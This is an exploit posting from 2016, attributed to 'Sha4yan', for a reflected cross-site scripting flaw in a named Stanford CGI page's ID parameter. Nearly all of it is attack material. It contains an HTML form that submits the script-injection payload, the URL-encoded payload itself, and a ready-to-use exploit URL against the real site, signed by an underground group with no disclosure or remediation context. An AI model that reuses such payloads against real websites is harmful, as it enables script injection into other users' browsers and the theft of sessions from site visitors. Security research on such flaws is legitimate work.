Stanford Cross Site Scripting
Posted on 10 January 2016
/*********************************************************************************** ** Exploit Title: Stanford CGI Cross Site Scripting Vulnerability ** ** Exploit Author: Sha4yan ** ** Vendor Homepage : http://cgi.stanford.edu/ ** ** Google Dork: none ** ** Date: 2016-01-08 ** ** Tested on: Ubuntu / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ****************** <html xmlns="http://www.w3.org/1999/xhtml"> <body> <form method="POST" action="http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E"> <input type="submit" value="Exploit@Sha4yan"/> </form> </body> </html> ************************************************************************************ Location & Vulnerable query: ****************** http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID= Add This : %22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E ************************************************************************************* ** Proof: ****************** Executable script tag in Stanford's Cgi Subdomain own page: Exploit : "><script>alert(/xss/)</script> Exploit query: http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E ****************************************************************************************** ** Persian Underground GateWay ******************************************************************************************
